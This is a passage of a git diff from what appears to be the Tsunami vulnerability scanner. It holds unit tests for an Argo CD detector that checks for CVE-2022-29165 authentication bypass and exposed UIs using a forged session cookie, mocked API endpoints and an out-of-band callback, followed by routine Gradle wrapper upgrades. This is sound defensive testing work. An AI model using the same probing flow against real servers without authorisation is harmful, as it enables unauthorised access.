Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(5); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Cve202229165_Resp_Matching() + throws IOException { + startMockWebServerForTestingWithResponseMatching(true); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(Severity.HIGH) + .setTitle("Argo CD API server Exposed") + .setDescription( + "Argo CD API server is vulnerable to CVE-2022-29165. The authentication" + + " can be bypassed. We can't confirm that this API server has an" + + " admin role because we can't create a new application and" + + " receive an out-of-band callback from it, but we are able to" + + " receive some endpoint data without authentication") + .setRecommendation( + "Patched versions are 2.1.15, and 2.3.4, and 2.2.9, and" + + " 2.1.15. Please update Argo CD to these versions and higher.")) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(4); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(0); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Exposed_Ui_Oob() throws IOException { + startMockWebServerForTestingWithOob(false); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(Severity.CRITICAL) + .setTitle("Argo CD API server Exposed") + .setDescription( + "Argo CD API server is misconfigured. The API server is not" + + " authenticated. All applications can be accessed by the public" + + " and therefore can be modified resulting in all application" + + " instances being compromised. The Argo CD UI does not support" + + " executing OS commands in the hosting machine at this time. We" + + " detected this vulnerable Argo CD API server by creating a test" + + " application and receiving out-of-band callback") + .setRecommendation( + "Please disable public access to your Argo CD API server.")) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(4); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Exposed_Ui_Resp_Matching() + throws IOException { + startMockWebServerForTestingWithResponseMatching(false); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(Severity.HIGH) + .setTitle("Argo CD API server Exposed") + .setDescription( + "Argo CD API server is misconfigured. The API server is not" + + " authenticated.We can't confirm that this API server has an" + + " admin role because we can't create a new application and" + + " receive an out-of-band callback from it, but we are able to" + + " receive some endpoint data without authentication") + .setRecommendation( + "Please disable public access to your Argo CD API server.")) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(3); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(0); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln_Exposed_Ui() throws IOException { + startMockWebServerForTestingWithOob(false); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(10); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln_Cve202229165() throws IOException { + startMockWebServerAlwaysReturn403(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(4); + } + + private void startMockWebServerForTestingWithOob(boolean mustHaveForgedCookie) + throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + // if withAnForgedCookie is True then we should check the forged cookie for all requests + if (mustHaveForgedCookie + && !Objects.equals( + request.getHeaders().get("Cookie"), PAYLOAD_ARGOCD_TOKEN_SESSION)) { + return new MockResponse().setResponseCode(403); + } + // get an existing model name + if (Objects.equals(request.getPath(), "/api/v1/projects?fields=items.metadata.name") + && request.getMethod().equals("GET")) { + return new MockResponse() + .setBody("{\"items\":[{\"metadata\":{\"name\":\"default\"}}]}") + .setResponseCode(200); + } + // Attempting to unload model + if (Objects.equals(request.getPath(), "/api/v1/clusters") + && request.getMethod().equals("GET")) { + return new MockResponse() + .setBody( + "{\"metadata\": {},\"items\": [{\"server\": " + + "\"https://kubernetes.default.svc\",\"name\": \"in-cluster\"," + + "\"config\": {\"tlsClientConfig\": {\"insecure\": false}}}]}") + .setResponseCode(200); + } + // Creating model repo layout: uploading the model + // Or Creating model repo layout: uploading model config + if (Objects.equals(request.getPath(), "/api/v1/applications")) { + if (request.getMethod().equals("POST") + && !request.getBody().readString(StandardCharsets.UTF_8).isEmpty() + && Objects.requireNonNull(request.getHeaders().get("Content-Type")) + .equals("application/json") + && (Objects.equals(request.getBody().readString(StandardCharsets.UTF_8), "s") + || request.getBody().readString(StandardCharsets.UTF_8).startsWith("s"))) { + return new MockResponse().setResponseCode(200); + } + } + // Loading model to trigger payload + if (Objects.equals( + request.getPath(), + "/api/v1/applications/tsunami-security-scanner?cascade=true&" + + "propagationPolicy=foreground&appNamespace=argocd")) { + if (request.getMethod().equals("DELETE") + && request.getBody().readString(StandardCharsets.UTF_8).isEmpty()) { + return new MockResponse().setResponseCode(200); + } + } + return new MockResponse().setBody("[{}]").setResponseCode(200); + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } + + private void startMockWebServerForTestingWithResponseMatching(boolean mustHaveForgedCookie) + throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + // if withAnForgedCookie is True then we should check the forged cookie for all requests + if (mustHaveForgedCookie + && !Objects.equals( + request.getHeaders().get("Cookie"), PAYLOAD_ARGOCD_TOKEN_SESSION)) { + return new MockResponse().setResponseCode(403); + } + // get an existing model name + if (Objects.equals(request.getPath(), "/api/v1/certificates") + && request.getMethod().equals("GET")) { + return new MockResponse() + .setBody( + "{\"metadata\":{},\"items\":[{\"serverName\":\"github.com\",\"certType\":" + + "\"ssh\",\"certSubType\":\"ecdsa-sha2-nistp256\",\"certData\":null,\"certInfo\":\"SHA256:p2QAMXNIC1TJYWeIOttrVc98/R1BUFWu3/LiyKgUfQM\"}]}") + .setResponseCode(200); + } + return new MockResponse().setResponseCode(403); + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } + + private void startMockWebServerAlwaysReturn403() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + return new MockResponse().setResponseCode(403); + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } +} diff --git a/community/detectors/atlassian_confluence_cve_2023_22518/gradle/wrapper/gradle-wrapper.properties b/community/detectors/atlassian_confluence_cve_2023_22518/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/atlassian_confluence_cve_2023_22518/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/atlassian_confluence_cve_2023_22518/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.jar b/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.properties b/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/bigip_cve_2022_1388/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/bigip_cve_2022_1388/gradlew b/community/detectors/bigip_cve_2022_1388/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/bigip_cve_2022_1388/gradlew +++ b/community/detectors/bigip_cve_2022_1388/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/bigip_cve_2022_1388/gradlew.bat b/community/detectors/bigip_cve_2022_1388/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/bigip_cve_2022_1388/gradlew.bat +++ b/community/detectors/bigip_cve_2022_1388/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.jar b/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.properties b/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/gitlab_cve_2021_22205/gradlew b/community/detectors/gitlab_cve_2021_22205/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/gitlab_cve_2021_22205/gradlew +++ b/community/detectors/gitlab_cve_2021_22205/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" 